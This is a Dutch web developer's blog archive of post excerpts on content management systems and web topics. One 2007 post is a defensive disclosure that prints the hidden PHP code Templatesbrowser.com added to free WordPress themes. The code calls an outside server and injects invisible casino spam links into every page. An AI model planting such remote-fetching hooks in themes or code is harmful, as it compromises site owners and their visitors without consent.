Drupal versus TYPO3: een vergelijking
- op 17 december 2010
- door Wessel
- in Commentaar, Ontwikkelingen
9
Wie zich verdiept in de wereld van open-source contentmanagementsystemen, komt al snel bekende namen als WordPress, Joomla, Drupal en TYPO3 tegen. Vooral Drupal en TYPO3 worden vaak toegepast voor het wat steviger werk, bijvoorbeeld sites met veel subsites, met allerlei web 2.0-achtige toepassingen en met koppelingen met externe systemen. Tot op zekere hoogte worden ze voor dezelfde soort websites ingezet, maar ze zijn totaal verschillend. Welk systeem moet je kiezen? Met zowel TYPO3 als Drupal heb ik nu ruim een jaar praktijkervaring, allebei in de omroepwereld, respectievelijk bij VARA en NCRV. Hieronder mijn bevindingen als webontwikkelaar.
lees verder»Een jaar ervaring met WordPress MU
- op 14 december 2009
- door Wessel
- in Commentaar, Ontwikkelingen
- 7
Najaar 2008 maakte ik voor het eerst kennis met WordPress MU, na ruim een jaar wordt het tijd om mijn ervaringen op een rijtje te zetten.
lees verder»Drupalcon Paris 2009
- op 15 september 2009
- door Wessel
- in Commentaar, Ontwikkelingen
- 1
In de eerste week van september vond in Parijs de halfjaarlijkse Drupal-conferentie plaats. Zonder meer een inspirerend evenement! In deze blogpost een overzicht van de sessies die ik heb bijgewoond, inclusief links naar beeldmateriaal.
lees verder»Nieuw tijdschrift over webdesign
- op 3 oktober 2007
- door Wessel
- in Ontwikkelingen
- 4
Sinds ict-uitgever IDG in 2003 stopte met NetProfessional en Kluwer in 2004 de stekker trok uit Adfo Web, dacht ik: de markt voor Nederlandstalige tijdschriften voor internetprofessionals is simpelweg te klein. Maar nu is er een andere uitgever die het toch weer gaat proberen. Volgende maand verschijnt het eerste nummer van Web-designer, een nieuw tijdschrift van F&L Publications dat zich richt op de creatieve aspecten van het ontwerpen van websites.
lees verder»Templatesbrowser.com en de blogosfeer
- op 9 augustus 2007
- door Wessel
- in Commentaar, Ontwikkelingen
- 1
Het blijft altijd weer curieus hoe nieuws zich verspreidt over de hele wereld. Zo’n drie maanden ontdekte Onno’s Follow That Page een rare link in mijn site en had ik na drie kwartier speuren en puzzelen genoeg bewijsmateriaal verzameld om de boosdoener aan te wijzen: de website Templatesbrowser.com verspreidt kwaadaardige WordPress-themes.
Een enorme beveiligingsinbreuk, maar het door Onno vertaalde bericht werd totaal niet opgepikt door de blogosfeer, ook niet na berichtjes op Digg en eKudos. Nu toch wel: in juni kwamen Joomla-gebruikers erachter dat Templatesbrowser.com niet te vertrouwen is en via deze omweg begint nu ook eindelijk de WordPress-wereld wakker te worden, lees bijvoorbeeld dit en dit. Ook een nieuw berichtje op Digg krijgt volle aandacht: WARNING! WordPress & Joomla; your theme might have malicious code. Is het het woordje WARNING waardoor internetters er nu wel aandacht aan besteden?
Betaaldiensten
- op 21 juni 2007
- door Wessel
- in Eigen werk, Handig, Ontwikkelingen
- 0
Een eerste experiment met betaalde webcontent, in samenwerking met Routewerk: op wandelsite Tweevoeter kun je sinds kort betaalde wandelroutes downloaden. Dit experiment is voorafgegaan door grondig onderzoek naar de bestaande betaaldiensten op internet, zoals iDeal, Paypal en ClickandBuy.
Uiteindelijk hebben we gekozen voor betalen via de telefonische betaaldienst Mollie, die bijvoorbeeld ook gebruikt wordt door Nieuwsbank.nl. De betaling is in hooguit twee minuten geregeld: je belt een 0900-nummer, je toetst een zescijferige code in en je krijgt meteen toegang tot de route, die je vervolgens kunt uitprinten. De kosten worden automatisch verrekend via je telefoonrekening. Je hebt geen creditcard of abonnement nodig en de transactie verloopt geheel anoniem.
Een ideale betaalmethode? De praktijk zal het leren.
Movable Type wordt open-source
- op 5 juni 2007
- door Wessel
- in Ontwikkelingen
- 0
Via Peter Olsthoorn een interessant nieuwtje van Maarten Schenk, werkzaam bij Six Apart: er is een bèta-versie verschenen van Movable Type 4.0. Een greep uit de nieuwe features:
- een totaal vernieuwde gebruikersinterface,
- een nieuwe WYSIWIG-editor,
- nieuwe import/export- en backup/restore-functies,
- een blogdashboard met statistieken,
- OpenID-ondersteuning,
- installatiewizard,
- ondersteuning voor losse pagina’s,
- ingebouwd asset-management voor het beheer van opgeladen bestanden en foto’s
En nog belangrijker nieuws: Movable Type wordt open-source. Dat kan ik alleen maar toejuichen, want eerder schreef ik nog over het vage Mambo-achtige tweesporenbeleid van Six Apart: een beetje commercieel, een beetje open-source. Het lijkt erop dat Six Apart voor het overweldigende succes van WordPress door de knieën gaat en niet alleen WordPress-achtige features introduceert, maar ook definitief kiest voor een open-source aanpak.
Enkele weken geleden schreef ik nog over een weeffout in WordPress, namelijk gratis themes waarin stukjes (mogelijk onveilige) PHP-scripting voorkomen. Als de nieuwe MT-versie inderdaad zo’n grote stap voorwaarts is, dan is de keuze voor mij duidelijk: dan blijf ik voor mijn belangrijkste sites voorlopig Movable Type gebruiken.
Verborgen linkspam van Templatesbrowser.com in WordPress-weblogs
- op 18 mei 2007
- door Wessel
- in Commentaar, Ontwikkelingen
- 5
Vorige maand roemde ik op deze plek de duizenden gratis WordPress-themes die je kunt downloaden om je weblog op te tuigen. Maar pas op: dankzij broer Onno en zijn onvolprezen dienst Follow That Page ontdekte ik vanmiddag dat sommige themes ook iets anders doen: verborgen links toevoegen naar casino-, hotel- en andere sites – kortom linkspam. En dit is de site die daarvoor verantwoordelijk is: www.templatesbrowser.com/wordpress-themes/.
Hoe werkt Templatesbrowser.com?
Op deze site kun je meer dan honderd gratis WordPress-themes downloaden. Deze themes zijn weer afkomstig van andere sites, maar uit de tien willekeurige themes die ik heb gedownload blijkt dat er is een sneaky stukje PHP-code toegevoegd aan het bestand functions.php:
function credits()
{
$url = “http://get.templatesbrowser.com/wp.php?” .
“url=” . urlencode($_SERVER['REQUEST_URI']) . “&” . “host=” . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen(“get.templatesbrowser.com”, 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}
Voor wie geen PHP kent: deze functie legt contact met get.templatesbrowser.com en geeft daarbij het adres van je eigen site mee. Bijvoorbeeld:
http://get.templatesbrowser.com/wp.php?url=%2F&host=www.laterna.nl
In mijn geval geeft de server de volgende code terug:
<div id=”copyl” style=”display: none;”><a href=”http://www.casinotropez.com/trcpromo-nincs-online-pmail18-fr”>casino en ligne</a></div>
Dit is de HTML-code van een link naar een site die ik niet ken en waar ik ook niets mee te maken wil hebben. Dankzij de CSS-toevoeging ‘display: none’ is die onzichtbaar opgemaakt. Deze code wordt onderaan elke WordPress-pagina toegevoegd. Dat gebeurt in het bestand footer.php:
<?php credits(); wp_footer(); ?>
Het geniepige is dat het contact met templatesbrowser.com alleen lijkt te werken vanuit een WordPress-weblog. Als ik bovenstaand webadres zelf invul in mijn browser, dan wordt er geen HTML-code teruggegeven.
Ook merk ik dat het uitmaakt op welk adres je weblog staat. Als ik urlencode($_SERVER['HTTP_HOST']) simpelweg vervang door www.google.com of www.startpagina.nl, dan wordt er geen verborgen link teruggegeven, maar helemaal niets, of iets onschuldigs als
<!– T-B –>
Ook zit er een random element in: als je op F5 drukt, verandert soms de code.
Een hogere PageRank?
Templatesbrowser.com doet dit klaarblijkelijk om sommige sites een hogere PageRank te bezorgen. Toch lijkt het me niet waarschijnlijk dat Google erin trapt. De manier waarop de link onzichtbaar is gemaakt (style=”display: none;”) is simpelweg té doorzichtig. Maar als Google inderdaad doorheeft dat het hier linkspam betreft, dan loopt de eigenaar van de weblog het risico om hiervoor gestraft te worden. Door de aard van PHP (een server-side scriptingtaal waarvan Google alleen de uitvoer ziet, niet de bron) is niet zichtbaar dat de betreffende HTML door een heel andere site wordt gegenereerd.
Het risico?
Uit het bovenstaande blijkt dat het downloaden van een WordPress-theme een zeker beveiligingsrisico inhoudt. Zoals gezegd bestaat zo’n theme niet alleen uit CSS-opmaak, maar ook uit extra PHP-code. Welke WordPress-gebruiker neemt de moeite om die meegeleverde PHP-code regel voor regel uit te vlooien alvorens een theme te installeren? PHP kan bovendien veel ernstiger dingen doen dan alleen maar een verborgen link in je site stoppen.
Al met al vind ik dit toch wel een belangrijk minpunt van WordPress. Voor zover ik kan nagaan, is het in Movable Type niet mogelijk om malicieuze code te stoppen in een template. Al met al lijkt de architectuur van WordPress meer op flexibiliteit gericht, minder op beveiliging.
Firefox: nog steeds veiliger dan Internet Explorer
- op 26 april 2007
- door Wessel
- in Ontwikkelingen
- 0
Regelmatig krijg ik van opdrachtgevers de vraag welke browser ze het beste kunnen gebruiken. Een kort maar krachtig antwoord: gebruik Firefox.
Hoewel de Firefox-hype afgelopen jaar wat minder is geworden en ook deze browser is in het nieuws gekomen door veiligheidsproblemen, blijkt Firefox nog steeds veiliger dan Internet Explorer. In beide browsers komen weliswaar ongeveer evenveel lekken voor, maar bij Firefox worden ze veel sneller gerepareerd:
De ontwikkelaars van Mozilla hadden – gemeten over 26 lekken – gemiddeld twee dagen nodig om een fout op te lossen. Bij Microsoft duurde het gemiddeld tien dagen, gemeten over vijftien lekken.
Ziek door de informatiesamenleving
- op 11 april 2007
- door Wessel
- in Commentaar, Ontwikkelingen
- 0
E-mails, telefoontjes en voicemails – ze maken ons alleen maar dommer. De psychiater Dr. Edward Hallowell heeft zelfs een nieuwe ziekte benoemd, die vooral in het bedrijfsleven welig tiert: ADT, ofwel Attention Deficit Trait. De symptomen:
When people find that they’re not working to their full potential; when they know that they could be producing more but in fact they’re producing less; when they know they’re smarter than their output shows; when they start answering questions in ways that are more superficial, more hurried than they usually would; when their reservoir of new ideas starts to run dry; when they find themselves working ever-longer hours and sleeping less, exercising less, spending free time with friends less and in general putting in more hours but getting less production overall.
En verderop:
It’s the great seduction of the information age. You can create the illusion of doing work and of being productive and creative when you’re not. You’re just treading water.
Meer bij News.com. En lees ook dit interview op Computerworld, waar hij enkele simpele remedies voorstelt. Zoals 25 jumping jacks, oftewel in de lucht springen met gespreide benen. Ha, dat wordt nog gezellig in de personeelskantine.
Recente reacties